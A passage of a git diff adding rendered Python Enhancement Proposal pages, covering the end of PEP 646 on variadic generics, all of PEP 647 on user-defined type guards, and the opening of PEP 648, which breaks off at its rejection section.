(For array shape operations in particular, having to specify +overloads for each possible rank is, of course, a rather cumbersome +solution. However, it’s the best we can do without additional type +manipulation mechanisms. We plan to introduce these in a future PEP.)

+
+
+
+

Rationale and Rejected Ideas

+
+

Shape Arithmetic

+

Considering the use case of array shapes in particular, note that as of +this PEP, it is not yet possible to describe arithmetic transformations +of array dimensions - for example, +def repeat_each_element(x: Array[N]) -> Array[2*N]. We consider +this out-of-scope for the current PEP, but plan to propose additional +mechanisms that will enable this in a future PEP.

+
+
+

Supporting Variadicity Through Aliases

+

As noted in the introduction, it is possible to avoid variadic generics +by simply defining aliases for each possible number of type parameters:

+
class Array1(Generic[Axis1]): ...
+class Array2(Generic[Axis1, Axis2]): ...
+
+
+

However, this seems somewhat clumsy - it requires users to unnecessarily +pepper their code with 1s, 2s, and so on for each rank necessary.

+
+
+

Construction of TypeVarTuple

+

TypeVarTuple began as ListVariadic, based on its naming in +an early implementation in Pyre.

+

We then changed this to TypeVar(list=True), on the basis that a) +it better emphasises the similarity to TypeVar, and b) the meaning +of ‘list’ is more easily understood than the jargon of ‘variadic’.

+

Once we’d decided that a variadic type variable should behave like a Tuple, +we also considered TypeVar(bound=Tuple), which is similarly intuitive +and accomplishes most what we wanted without requiring any new arguments to +TypeVar. However, we realised this may constrain us in the future, if +for example we want type bounds or variance to function slightly differently +for variadic type variables than what the semantics of TypeVar might +otherwise imply. Also, we may later wish to support arguments that should not be supported by regular type variables (such as arbitrary_len [10]).

+

We therefore settled on TypeVarTuple.

+
+
+

Unspecified Type Parameters: Tuple vs TypeVarTuple

+

In order to support gradual typing, this PEP states that both +of the following examples should type-check correctly:

+
def takes_any_array(x: Array): ...
+x: Array[Height, Width]
+takes_any_array(x)
+
+def takes_specific_array(y: Array[Height, Width]): ...
+y: Array
+takes_specific_array(y)
+
+
+

Note that this is in contrast to the behaviour of the only currently-existing +variadic type in Python, Tuple:

+
def takes_any_tuple(x: Tuple): ...
+x: Tuple[int, str]
+takes_any_tuple(x)  # Valid
+
+def takes_specific_tuple(y: Tuple[int, str]): ...
+y: Tuple
+takes_specific_tuple(y)  # Error
+
+
+

The rules for Tuple were deliberately chosen such that the latter case +is an error: it was thought to be more likely that the programmer has made a +mistake than that the function expects a specific kind of Tuple but the +specific kind of Tuple passed is unknown to the type checker. Additionally, +Tuple is something of a special case, in that it is used to represent +immutable sequences. That is, if an object’s type is inferred to be an +unparameterised Tuple, it is not necessarily because of incomplete typing.

+

In contrast, if an object’s type is inferred to be an unparameterised Array, +it is much more likely that the user has simply not yet fully annotated their +code, or that the signature of a shape-manipulating library function cannot yet +be expressed using the typing system and therefore returning a plain Array +is the only option. We rarely deal with arrays of truly arbitrary shape; +in certain cases, some parts of the shape will be arbitrary - for example, +when dealing with sequences, the first two parts of the shape are often +‘batch’ and ‘time’ - but we plan to support these cases explicitly in a +future PEP with a syntax such as Array[Batch, Time, ...].

+

We therefore made the decision to have variadic generics other than +Tuple behave differently, in order to give the user more flexibility +in how much of their code they wish to annotate, and to enable compatibility +between old unannotated code and new versions of libraries which do use +these type annotations.

+
+
+
+

Alternatives

+

It should be noted that the approach outlined in this PEP to solve the +issue of shape checking in numerical libraries is not the only approach +possible. Examples of lighter-weight alternatives based on runtime checking include +ShapeGuard [13], tsanley [11], and PyContracts [12].

+

While these existing approaches improve significantly on the default +situation of shape checking only being possible through lengthy and verbose +assert statements, none of them enable static analysis of shape correctness. +As mentioned in Motivation, this is particularly desirable for +machine learning applications where, due to library and infrastructure complexity, +even relatively simple programs must suffer long startup times; iterating +by running the program until it crashes, as is necessary with these +existing runtime-based approaches, can be a tedious and frustrating +experience.

+

Our hope with this PEP is to begin to codify generic type annotations as +an official, language-supported way of dealing with shape correctness. +With something of a standard in place, in the long run, this will +hopefully enable a thriving ecosystem of tools for analysing and verifying +shape properties of numerical computing programs.

+
+
+

Grammar Changes

+

This PEP requires two grammar changes.

+
+

Change 1: Star Expressions in Indexes

+

The first grammar change enables use of star expressions in index operations (that is, +within square brackets), necessary to support star-unpacking of TypeVarTuples:

+
DType = TypeVar('DType')
+Shape = TypeVarTuple('Shape')
+class Array(Generic[DType, *Shape]):
+    ...
+
+
+

Before:

+
slices:
+    | slice !','
+    | ','.slice+ [',']
+
+
+

After:

+
slices:
+    | slice !','
+    | ','.(slice | starred_expression)+ [',']
+
+
+

As with star-unpacking in other contexts, the star operator calls __iter__ +on the callee, and adds the contents of the resulting iterator to the argument +passed to __getitem__. For example, if we do foo[a, *b, c], and +b.__iter__ produces an iterator yielding d and e, +foo.__getitem__ would receive (a, d, e, c).

+

To put it another way, note that x[..., *a, ...] produces the same result +as x[(..., *a, ...)] (with any slices i:j in ... replaced with +slice(i, j), with the one edge case that x[*a] becomes x[(*a,)]).

+
+

TypeVarTuple Implementation

+

With this grammar change, TypeVarTuple is implemented as follows. +Note that this implementation is useful only for the benefit of a) correct +repr() and b) runtime analysers; static analysers would not use the +implementation.

+
class TypeVarTuple:
+    def __init__(self, name):
+        self._name = name
+        self._unpacked = UnpackedTypeVarTuple(name)
+    def __iter__(self):
+        yield self._unpacked
+    def __repr__(self):
+        return self._name
+
+class UnpackedTypeVarTuple:
+    def __init__(self, name):
+        self._name = name
+    def __repr__(self):
+        return '*' + self._name
+
+
+
+
+

Implications

+

This grammar change implies a number of additional changes in behaviour not +required by this PEP. We choose to allow these additional changes rather than +disallowing them at a syntax level in order to keep the syntax change as small +as possible.

+

First, the grammar change enables star-unpacking of other structures, such +as lists, within indexing operations:

+
idxs = (1, 2)
+array_slice = array[0, *idxs, -1]  # Equivalent to [0, 1, 2, -1]
+array[0, *idxs, -1] = array_slice  # Also allowed
+
+
+

Second, more than one instance of a star-unpack can occur within an index:

+
array[*idxs_to_select, *idxs_to_select]  # Equivalent to array[1, 2, 1, 2]
+
+
+

Note that this PEP disallows multiple unpacked TypeVarTuples within a single +type parameter list. This requirement would therefore need to be implemented +in type checking tools themselves rather than at the syntax level.

+

Third, slices may co-occur with starred expressions:

+
array[3:5, *idxs_to_select]  # Equivalent to array[3:5, 1, 2]
+
+
+

However, note that slices involving starred expressions are still invalid:

+
# Syntax error
+array[*idxs_start:*idxs_end]
+
+
+
+
+
+

Change 2: *args as a TypeVarTuple

+

The second change enables use of *args: *Ts in function definitions.

+

Before:

+
star_etc:
+| '*' param_no_default param_maybe_default* [kwds]
+| '*' ',' param_maybe_default+ [kwds]
+| kwds
+
+
+

After:

+
star_etc:
+| '*' param_no_default param_maybe_default* [kwds]
+| '*' param_no_default_star_annotation param_maybe_default* [kwds]  # New
+| '*' ',' param_maybe_default+ [kwds]
+| kwds
+
+
+

Where:

+
param_no_default_star_annotation:
+| param_star_annotation ',' TYPE_COMMENT?
+| param_star_annotation TYPE_COMMENT? &')'
+
+param_star_annotation: NAME star_annotation
+
+star_annotation: ':' star_expression
+
+
+

We also need to deal with the star_expression that results from this +construction. Normally, a star_expression occurs within the context +of e.g. a list, so a star_expression is handled by essentially +calling iter() on the starred object, and inserting the results +of the resulting iterator into the list at the appropriate place. For +*args: *Ts, however, we must process the star_expression in a +different way.

+

We do this by instead making a special case for the star_expression +resulting from *args: *Ts, emitting code equivalent to +[annotation_value] = [*Ts]. That is, we create an iterator from +Ts by calling Ts.__iter__, fetch a single value from the iterator, +verify that the iterator is exhausted, and set that value as the annotation +value. This results in the unpacked TypeVarTuple being set directly +as the runtime annotation for *args:

+
>>> Ts = TypeVarTuple('Ts')
+>>> def foo(*args: *Ts): pass
+>>> foo.__annotations__
+{'args': *Ts}
+# *Ts is the repr() of Ts._unpacked, an instance of UnpackedTypeVarTuple
+
+
+

This allows the runtime annotation to be consistent with an AST representation +that uses a Starred node for the annotations of args - in turn important +for tools that rely on the AST such as mypy to correctly recognise the construction:

+
>>> print(ast.dump(ast.parse('def foo(*args: *Ts): pass'), indent=2))
+Module(
+  body=[
+    FunctionDef(
+      name='foo',
+      args=arguments(
+        posonlyargs=[],
+        args=[],
+        vararg=arg(
+          arg='args',
+          annotation=Starred(
+            value=Name(id='Ts', ctx=Load()),
+            ctx=Load())),
+        kwonlyargs=[],
+        kw_defaults=[],
+        defaults=[]),
+      body=[
+        Pass()],
+      decorator_list=[])],
+  type_ignores=[])
+
+
+

Note that the only scenario in which this grammar change allows *Ts to be +used as a direct annotation (rather than being wrapped in e.g. Tuple[*Ts]) +is *args. Other uses are still invalid:

+
x: *Ts                 # Syntax error
+def foo(x: *Ts): pass  # Syntax error
+
+
+
+

Implications

+

As with the first grammar change, this change also has a number of side effects. +In particular, the annotation of *args could be set to a starred object +other than a TypeVarTuple - for example, the following nonsensical +annotations are possible:

+
>>> foo = [1]
+>>> def bar(*args: *foo): pass
+>>> bar.__annotations__
+{'args': 1}
+
+>>> foo = [1, 2]
+>>> def bar(*args: *foo): pass
+ValueError: too many values to unpack (expected 1)
+
+
+

Again, prevention of such annotations will need to be done by, say, static +checkers, rather than at the level of syntax.

+
+
+
+

Alternatives (Why Not Just Use Unpack?)

+

If these grammar changes are considered too burdensome, there are two +alternatives.

+

The first would be to support change 1 but not change 2. Variadic generics +are more important to us than the ability to annotate *args.

+

The second alternative would be to use ``Unpack`` instead, requiring no +grammar changes. However, we regard this as a suboptimal solution for two +reasons:

+
    +
  • Readability. class Array(Generic[DType, Unpack[Shape]]) is a bit +of a mouthful; the flow of reading is interrupted by length of Unpack and +the extra set of square brackets. class Array(Generic[DType, *Shape]) +is much easier to skim, while still marking Shape as special.
  • +
  • Intuitiveness. We think a user is more likely to intuitively understand +the meaning of *Ts - especially when they see that Ts is a +TypeVar**Tuple** - than the meaning of Unpack[Ts]. (This assumes +the user is familiar with star-unpacking in other contexts; if the +user is reading or writing code that uses variadic generics, this seems +reasonable.)
  • +
+

If even change 1 is thought too significant a change, therefore, it might be +better for us to reconsider our options before going ahead with this second +alternative.

+
+
+
+

Backwards Compatibility

+

The Unpack version of the PEP should be back-portable to previous +versions of Python.

+

Gradual typing is enabled by the fact that unparameterised variadic classes +are compatible with an arbitrary number of type parameters. This means +that if existing classes are made generic, a) all existing (unparameterised) +uses of the class will still work, and b) parameterised and unparameterised +versions of the class can be used together (relevant if, for example, library +code is updated to use parameters while user code is not, or vice-versa).

+
+
+

Reference Implementation

+

Two reference implementations of type-checking functionality exist: +one in Pyre, as of v0.9.0, and one in Pyright, as of v1.1.108.

+

A preliminary implementation of the Unpack version of the PEP in CPython +is available in cpython/23527. A preliminary version of the version +using the star operator, based on an early implementation of PEP 637, +is also available at mrahtz/cpython/pep637+646.

+
+
+

Appendix A: Shape Typing Use Cases

+

To give this PEP additional context for those particularly interested in the +array typing use case, in this appendix we expand on the different ways +this PEP can be used for specifying shape-based subtypes.

+
+

Use Case 1: Specifying Shape Values

+

The simplest way to parameterise array types is using Literal +type parameters - e.g. Array[Literal[64], Literal[64]].

+

We can attach names to each parameter using normal type variables:

+
K = TypeVar('K')
+N = TypeVar('N')
+
+def matrix_vector_multiply(x: Array[K, N], y: Array[N]) -> Array[K]: ...
+
+a: Array[Literal[64], Literal[32]]
+b: Array[Literal[32]]
+matrix_vector_multiply(a, b)
+# Result is Array[Literal[64]]
+
+
+

Note that such names have a purely local scope. That is, the name +K is bound to Literal[64] only within matrix_vector_multiply. To put it another +way, there’s no relationship between the value of K in different +signatures. This is important: it would be inconvenient if every axis named K +were constrained to have the same value throughout the entire program.

+

The disadvantage of this approach is that we have no ability to enforce shape semantics across +different calls. For example, we can’t address the problem mentioned in Motivation: if +one function returns an array with leading dimensions ‘Time × Batch’, and another function +takes the same array assuming leading dimensions ‘Batch × Time’, we have no way of detecting this.

+

The main advantage is that in some cases, axis sizes really are what we care about. This is true +for both simple linear algebra operations such as the matrix manipulations above, but also in more +complicated transformations such as convolutional layers in neural networks, where it would be of +great utility to the programmer to be able to inspect the array size after each layer using +static analysis. To aid this, in the future we would like to explore possibilities for additional +type operators that enable arithmetic on array shapes - for example:

+
def repeat_each_element(x: Array[N]) -> Array[Mul[2, N]]: ...
+
+
+

Such arithmetic type operators would only make sense if names such as N refer to axis size.

+
+
+

Use Case 2: Specifying Shape Semantics

+

A second approach (the one that most of the examples in this PEP are based around) +is to forgo annotation with actual axis size, and instead annotate axis type.

+

This would enable us to solve the problem of enforcing shape properties across calls. +For example:

+
# lib.py
+
+class Batch: pass
+class Time: pass
+
+def make_array() -> Array[Batch, Time]: ...
+
+# user.py
+
+from lib import Batch, Time
+
+# `Batch` and `Time` have the same identity as in `lib`,
+# so must take array as produced by `lib.make_array`
+def use_array(x: Array[Batch, Time]): ...
+
+
+

Note that in this case, names are global (to the extent that we use the +same Batch type in different place). However, because names refer only +to axis types, this doesn’t constrain the value of certain axes to be +the same through (that is, this doesn’t constrain all axes named Height +to have a value of, say, 480 throughout).

+

The argument for this approach is that in many cases, axis type is the more +important thing to verify; we care more about which axis is which than what the +specific size of each axis is.

+

It also does not preclude cases where we wish to describe shape transformations +without knowing the type ahead of time. For example, we can still write:

+
K = TypeVar('K')
+N = TypeVar('N')
+
+def matrix_vector_multiply(x: Array[K, N], y: Array[N]) -> Array[K]: ...
+
+
+

We can then use this with:

+
class Batch: pass
+class Values: pass
+
+batch_of_values: Array[Batch, Values]
+value_weights: Array[Values]
+matrix_vector_multiply(batch_of_values, value_weights)
+# Result is Array[Batch]
+
+
+

The disadvantages are the inverse of the advantages from use case 1. +In particular, this approach does not lend itself well to arithmetic +on axis types: Mul[2, Batch] would be as meaningless as 2 * int.

+
+
+

Discussion

+

Note that use cases 1 and 2 are mutually exclusive in user code. Users +can verify size or semantic type but not both.

+

As of this PEP, we are agnostic about which approach will provide most benefit. +Since the features introduced in this PEP are compatible with both approaches, however, +we leave the door open.

+
+
+

Why Not Both?

+

Consider the following ‘normal’ code:

+
def f(x: int): ...
+
+
+

Note that we have symbols for both the value of the thing (x) and the type of +the thing (int). Why can’t we do the same with axes? For example, with an imaginary +syntax, we could write:

+
def f(array: Array[TimeValue: TimeType]): ...
+
+
+

This would allow us to access the axis size (say, 32) through the symbol TimeValue +and the type through the symbol TypeType.

+

This might even be possible using existing syntax, through a second level of parameterisation:

+
def f(array: array[TimeValue[TimeType]]): ..
+
+
+

However, we leave exploration of this approach to the future.

+
+
+
+

Appendix B: Shaped Types vs Named Axes

+

An issue related to those addressed by this PEP concerns +axis selection. For example, if we have an image stored in an array of shape 64×64x3, +we might wish to convert to black-and-white by computing the mean over the third +axis, mean(image, axis=2). Unfortunately, the simple typo axis=1 is +difficult to spot and will produce a result that means something completely different +(all while likely allowing the program to keep on running, resulting in a bug +that is serious but silent).

+

In response, some libraries have implemented so-called ‘named tensors’ (in this context, +‘tensor’ is synonymous with ‘array’), in which axes are selected not by index but by +label - e.g. mean(image, axis='channels').

+

A question we are often asked about this PEP is: why not just use named tensors? +The answer is that we consider the named tensors approach insufficient, for two main reasons:

+
    +
  • Static checking of shape correctness is not possible. As mentioned in Motivation, +this is a highly desirable feature in machine learning code where iteration times +are slow by default.
  • +
  • Interface documentation is still not possible with this approach. If a function should +only be willing to take array arguments that have image-like shapes, this cannot be stipulated +with named tensors.
  • +
+

Additionally, there’s the issue of poor uptake. At the time of writing, named tensors +have only been implemented in a small number of numerical computing libraries. Possible explanations for this +include difficulty of implementation (the whole API must be modified to allow selection by axis name +instead of index), and lack of usefulness due to the fact that axis ordering conventions are often +strong enough that axis names provide little benefit (e.g. when working with images, 3D tensors are +basically always height × width × channels). However, ultimately we are still uncertain +why this is the case.

+

Can the named tensors approach be combined with the approach we advocate for in +this PEP? We’re not sure. One area of overlap is that in some contexts, we could do, say:

+
Image: Array[Height, Width, Channels]
+im: Image
+mean(im, axis=Image.axes.index(Channels)
+
+
+

Ideally, we might write something like im: Array[Height=64, Width=64, Channels=3] - +but this won’t be possible in the short term, due to the rejection of PEP 637. +In any case, our attitude towards this is mostly “Wait and see what happens before +taking any further steps”.

+
+
+

Footnotes

+ +
+
+

Endorsements

+

Variadic generics have a wide range of uses. For the fraction of that range +involving numerical computing, how likely is it that relevant libraries will +actually make use of the features proposed in this PEP?

+

We reached out to a number of people with this question, and received the +following endorsements.

+

From Stephan Hoyer, member of the NumPy Steering Council: +[14]

+
+
I just wanted to thank Matthew & Pradeep for writing this PEP and for +clarifications to the broader context of PEP 646 for array typing in +https://github.com/python/peps/pull/1904.

As someone who is heavily involved in the Python numerical computing +community (e.g., NumPy, JAX, Xarray), but who is not so familiar with the +details of Python’s type system, it is reassuring to see that a broad range +of use-cases related to type checking of named axes & shapes have been +considered, and could build upon the infrastructure in this PEP.

+

Type checking for shapes is something the NumPy community is very +interested in – there are more thumbs up on the relevant issue on NumPy’s +GitHub than any others (https://github.com/numpy/numpy/issues/7370) and we +recently added a “typing” module that is under active development.

+

It will certainly require experimentation to figure out the best ways to +use type checking for ndarrays, but this PEP looks like an excellent +foundation for such work.

+
+

From Bas van Beek, who has worked on preliminary support for +shape-generics in NumPy:

+
+
I very much share Stephan’s opinion here and look forward to integrating the +new PEP 646 variadics into numpy.

In the context of numpy (and tensor typing general): the typing of array +shapes is a fairly complicated subject and the introduction of variadics +will likely play in big role in laying its foundation, as it allows for the +expression of both dimensioability as well as basic shape manipulation.

+

All in all, I’m very interested in where both PEP 646 and future PEPs will +take us and look forward to further developments.

+
+

From Dan Moldovan, a Senior Software Engineer on the TensorFlow Dev Team +and author of the TensorFlow RFC, TensorFlow Canonical Type System: [15]

+
+
I’d be interested in using this the mechanisms defined in this PEP to define +rank-generic Tensor types in TensorFlow, which are important in specifying +tf.function signatures in a Pythonic way, using type annotations (rather +than the custom input_signature mechanism we have today - see this +issue: https://github.com/tensorflow/tensorflow/issues/31579). Variadic +generics are among the last few missing pieces to create an elegant set of +type definitions for tensors and shapes.
+

(For the sake of transparency - we also reached out to folks from a third popular +numerical computing library, PyTorch, but did not receive a statement of +endorsement from them. Our understanding is that although they are interested +in some of the same issues - e.g. static shape inference - they are currently +focusing on enabling this through a DSL rather than the Python type system.)

+
+
+

Acknowledgements

+

Thank you to Alfonso Castaño, Antoine Pitrou, Bas v.B., David Foster, Dimitris Vardoulakis, Eric Traut, Guido van Rossum, Jia Chen, +Lucio Fernandez-Arjona, Nikita Sobolev, Peilonrayz, Rebecca Chen, +Sergei Lebedev, and Vladimir Mikulik for helpful feedback and suggestions on +drafts of this PEP.

+

Thank you especially to Lucio for suggesting the star syntax (which has made multiple aspects of this proposal much more concise and intuitive), and to Stephan Hoyer and Dan Moldovan for their endorsements.

+
+
+

Resources

+

Discussions on variadic generics in Python started in 2016 with Issue 193 +on the python/typing GitHub repository [4].

+

Inspired by this discussion, Ivan Levkivskyi made a concrete proposal +at PyCon 2019, summarised in notes on ‘Type system improvements’ [5] +and ‘Static typing of Python numeric stack’ [6].

+

Expanding on these ideas, Mark Mendoza and Vincent Siles gave a presentation on +‘Variadic Type Variables for Decorators and Tensors’ [8] at the 2019 Python +Typing Summit.

+

Discussion over how type substitution in generic aliases should behave +took place in cpython#91162.

+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0646.rst

+

Last modified: 2024-06-27 00:41:45 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0647/index.html b/pep-0647/index.html new file mode 100644 index 00000000000..d8fc06b9aca --- /dev/null +++ b/pep-0647/index.html @@ -0,0 +1,463 @@ + + + + + + + + PEP 647 – User-Defined Type Guards | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 647 – User-Defined Type Guards

+
+
Author:
+
Eric Traut <erictr at microsoft.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
07-Oct-2020
+
Python-Version:
+
3.10
+
Post-History:
+
28-Dec-2020, 09-Apr-2021
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see TypeGuard and +typing.TypeGuard for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP specifies a way for programs to influence conditional type narrowing +employed by a type checker based on runtime checks.

+
+
+

Motivation

+

Static type checkers commonly employ a technique called “type narrowing” to +determine a more precise type of an expression within a program’s code flow. +When type narrowing is applied within a block of code based on a conditional +code flow statement (such as if and while statements), the conditional +expression is sometimes referred to as a “type guard”. Python type checkers +typically support various forms of type guards expressions.

+
def func(val: Optional[str]):
+    # "is None" type guard
+    if val is not None:
+        # Type of val is narrowed to str
+        ...
+    else:
+        # Type of val is narrowed to None
+        ...
+
+def func(val: Optional[str]):
+    # Truthy type guard
+    if val:
+        # Type of val is narrowed to str
+        ...
+    else:
+        # Type of val remains Optional[str]
+        ...
+
+def func(val: Union[str, float]):
+    # "isinstance" type guard
+    if isinstance(val, str):
+        # Type of val is narrowed to str
+        ...
+    else:
+        # Type of val is narrowed to float
+        ...
+
+def func(val: Literal[1, 2]):
+    # Comparison type guard
+    if val == 1:
+        # Type of val is narrowed to Literal[1]
+        ...
+    else:
+        # Type of val is narrowed to Literal[2]
+        ...
+
+
+

There are cases where type narrowing cannot be applied based on static +information only. Consider the following example:

+
def is_str_list(val: List[object]) -> bool:
+    """Determines whether all objects in the list are strings"""
+    return all(isinstance(x, str) for x in val)
+
+def func1(val: List[object]):
+    if is_str_list(val):
+        print(" ".join(val)) # Error: invalid type
+
+
+

This code is correct, but a type checker will report a type error because +the value val passed to the join method is understood to be of type +List[object]. The type checker does not have enough information to +statically verify that the type of val is List[str] at this point.

+

This PEP introduces a way for a function like is_str_list to be defined as +a “user-defined type guard”. This allows code to extend the type guards that +are supported by type checkers.

+

Using this new mechanism, the is_str_list function in the above example +would be modified slightly. Its return type would be changed from bool +to TypeGuard[List[str]]. This promises not merely that the return value +is boolean, but that a true indicates the input to the function was of the +specified type.

+
from typing import TypeGuard
+
+def is_str_list(val: List[object]) -> TypeGuard[List[str]]:
+    """Determines whether all objects in the list are strings"""
+    return all(isinstance(x, str) for x in val)
+
+
+

User-defined type guards can also be used to determine whether a dictionary +conforms to the type requirements of a TypedDict.

+
class Person(TypedDict):
+    name: str
+    age: int
+
+def is_person(val: dict) -> "TypeGuard[Person]":
+    try:
+        return isinstance(val["name"], str) and isinstance(val["age"], int)
+    except KeyError:
+        return False
+
+def print_age(val: dict):
+    if is_person(val):
+        print(f"Age: {val['age']}")
+    else:
+        print("Not a person!")
+
+
+
+
+

Specification

+
+

TypeGuard Type

+

This PEP introduces the symbol TypeGuard exported from the typing +module. TypeGuard is a special form that accepts a single type argument. +It is used to annotate the return type of a user-defined type guard function. +Return statements within a type guard function should return bool values, +and type checkers should verify that all return paths return a bool.

+

In all other respects, TypeGuard is a distinct type from bool. It is not a +subtype of bool. Therefore, Callable[..., TypeGuard[int]] is not assignable +to Callable[..., bool].

+

When TypeGuard is used to annotate the return type of a function or +method that accepts at least one parameter, that function or method is +treated by type checkers as a user-defined type guard. The type argument +provided for TypeGuard indicates the type that has been validated by +the function.

+

User-defined type guards can be generic functions, as shown in this example:

+
_T = TypeVar("_T")
+
+def is_two_element_tuple(val: Tuple[_T, ...]) -> TypeGuard[Tuple[_T, _T]]:
+    return len(val) == 2
+
+def func(names: Tuple[str, ...]):
+    if is_two_element_tuple(names):
+        reveal_type(names)  # Tuple[str, str]
+    else:
+        reveal_type(names)  # Tuple[str, ...]
+
+
+

Type checkers should assume that type narrowing should be applied to the +expression that is passed as the first positional argument to a user-defined +type guard. If the type guard function accepts more than one argument, no +type narrowing is applied to those additional argument expressions.

+

If a type guard function is implemented as an instance method or class method, +the first positional argument maps to the second parameter (after “self” or +“cls”).

+

Here are some examples of user-defined type guard functions that accept more +than one argument:

+
def is_str_list(val: List[object], allow_empty: bool) -> TypeGuard[List[str]]:
+    if len(val) == 0:
+        return allow_empty
+    return all(isinstance(x, str) for x in val)
+
+_T = TypeVar("_T")
+
+def is_set_of(val: Set[Any], type: Type[_T]) -> TypeGuard[Set[_T]]:
+    return all(isinstance(x, type) for x in val)
+
+
+

The return type of a user-defined type guard function will normally refer to +a type that is strictly “narrower” than the type of the first argument (that +is, it’s a more specific type that can be assigned to the more general type). +However, it is not required that the return type be strictly narrower. This +allows for cases like the example above where List[str] is not assignable +to List[object].

+

When a conditional statement includes a call to a user-defined type guard +function, and that function returns true, the expression passed as the first +positional argument to the type guard function should be assumed by a static +type checker to take on the type specified in the TypeGuard return type, +unless and until it is further narrowed within the conditional code block.

+

Some built-in type guards provide narrowing for both positive and negative +tests (in both the if and else clauses). For example, consider the +type guard for an expression of the form x is None. If x has a type that +is a union of None and some other type, it will be narrowed to None in the +positive case and the other type in the negative case. User-defined type +guards apply narrowing only in the positive case (the if clause). The type +is not narrowed in the negative case.

+
OneOrTwoStrs = Union[Tuple[str], Tuple[str, str]]
+def func(val: OneOrTwoStrs):
+    if is_two_element_tuple(val):
+        reveal_type(val)  # Tuple[str, str]
+        ...
+    else:
+        reveal_type(val)   # OneOrTwoStrs
+        ...
+
+    if not is_two_element_tuple(val):
+        reveal_type(val)   # OneOrTwoStrs
+        ...
+    else:
+        reveal_type(val)  # Tuple[str, str]
+        ...
+
+
+
+
+
+

Backwards Compatibility

+

Existing code that does not use this new functionality will be unaffected.

+

Notably, code which uses annotations in a manner incompatible with the +stdlib typing library should simply not import TypeGuard.

+
+
+

Reference Implementation

+

The Pyright type checker supports the behavior described in this PEP.

+
+
+

Rejected Ideas

+
+

Decorator Syntax

+

The use of a decorator was considered for defining type guards.

+
@type_guard(List[str])
+def is_str_list(val: List[object]) -> bool: ...
+
+
+

The decorator approach is inferior because it requires runtime evaluation of +the type, precluding forward references. The proposed approach was also deemed +to be easier to understand and simpler to implement.

+
+
+

Enforcing Strict Narrowing

+

Strict type narrowing enforcement (requiring that the type specified +in the TypeGuard type argument is a narrower form of the type specified +for the first parameter) was considered, but this eliminates valuable +use cases for this functionality. For instance, the is_str_list example +above would be considered invalid because List[str] is not a subtype of +List[object] because of invariance rules.

+

One variation that was considered was to require a strict narrowing requirement +by default but allow the type guard function to specify some flag to +indicate that it is not following this requirement. This was rejected because +it was deemed cumbersome and unnecessary.

+

Another consideration was to define some less-strict check that ensures that +there is some overlap between the value type and the narrowed type specified +in the TypeGuard. The problem with this proposal is that the rules for type +compatibility are already very complex when considering unions, protocols, +type variables, generics, etc. Defining a variant of these rules that relaxes +some of these constraints just for the purpose of this feature would require +that we articulate all of the subtle ways in which the rules differ and under +what specific circumstances the constrains are relaxed. For this reason, +it was decided to omit all checks.

+

It was noted that without enforcing strict narrowing, it would be possible to +break type safety. A poorly-written type guard function could produce unsafe or +even nonsensical results. For example:

+
def f(value: int) -> TypeGuard[str]:
+    return True
+
+
+

However, there are many ways a determined or uninformed developer can subvert +type safety – most commonly by using cast or Any. If a Python +developer takes the time to learn about and implement user-defined +type guards within their code, it is safe to assume that they are interested +in type safety and will not write their type guard functions in a way that will +undermine type safety or produce nonsensical results.

+
+
+

Conditionally Applying TypeGuard Type

+

It was suggested that the expression passed as the first argument to a type +guard function should retain its existing type if the type of the expression was +a proper subtype of the type specified in the TypeGuard return type. +For example, if the type guard function is def f(value: object) -> +TypeGuard[float] and the expression passed to this function is of type +int, it would retain the int type rather than take on the +float type indicated by the TypeGuard return type. This proposal was +rejected because it added complexity, inconsistency, and opened up additional +questions about the proper behavior if the type of the expression was of +composite types like unions or type variables with multiple constraints. It was +decided that the added complexity and inconsistency was not justified given +that it would provide little or no added value.

+
+
+

Narrowing of Arbitrary Parameters

+

TypeScript’s formulation of user-defined type guards allows for any input +parameter to be used as the value tested for narrowing. The TypeScript language +authors could not recall any real-world examples in TypeScript where the +parameter being tested was not the first parameter. For this reason, it was +decided unnecessary to burden the Python implementation of user-defined type +guards with additional complexity to support a contrived use case. If such +use cases are identified in the future, there are ways the TypeGuard mechanism +could be extended. This could involve the use of keyword indexing, as proposed +in PEP 637.

+
+
+

Narrowing of Implicit “self” and “cls” Parameters

+

The proposal states that the first positional argument is assumed to be the +value that is tested for narrowing. If the type guard function is implemented +as an instance or class method, an implicit self or cls argument will +also be passed to the function. A concern was raised that there may be +cases where it is desired to apply the narrowing logic on self and cls. +This is an unusual use case, and accommodating it would significantly +complicate the implementation of user-defined type guards. It was therefore +decided that no special provision would be made for it. If narrowing +of self or cls is required, the value can be passed as an explicit +argument to a type guard function.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0647.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0648/index.html b/pep-0648/index.html new file mode 100644 index 00000000000..6b24d680da9 --- /dev/null +++ b/pep-0648/index.html @@ -0,0 +1,703 @@ + + + + + + + + PEP 648 – Extensible customizations of the interpreter at startup | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 648 – Extensible customizations of the interpreter at startup

+
+
Author:
+
Mario Corchero <mariocj89 at gmail.com>
+
Sponsor:
+
Pablo Galindo
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
30-Dec-2020
+
Python-Version:
+
3.11
+
Post-History:
+
16-Dec-2020, 18-Dec-2020
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes supporting extensible customization of the interpreter by +allowing users to install files that will be executed at startup.

+
+
+

PEP Rejection

+

